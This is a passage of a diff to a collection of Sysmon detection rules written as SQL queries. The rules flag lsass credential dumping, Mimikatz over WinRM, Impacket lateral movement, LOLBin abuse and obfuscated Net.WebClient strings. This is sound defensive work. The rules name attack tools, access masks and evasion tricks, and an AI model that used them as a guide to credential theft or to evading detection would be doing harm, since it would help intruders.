Microsoft UI parts." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "title": "Mimikatz through 
Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1047", + "attack.t1003.001", + "attack.t1059.001", "attack.lateral_movement", - "attack.t1021.003" + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Suspicious WMIC Execution Via Office 
Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": 
"proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "PUA - Sysinternal Tool Execution - Registry", + "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" 
flag", - "author": "frack113, Florian Roth", + "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "status": "experimental", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environnement" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE 
'\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine 
LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE 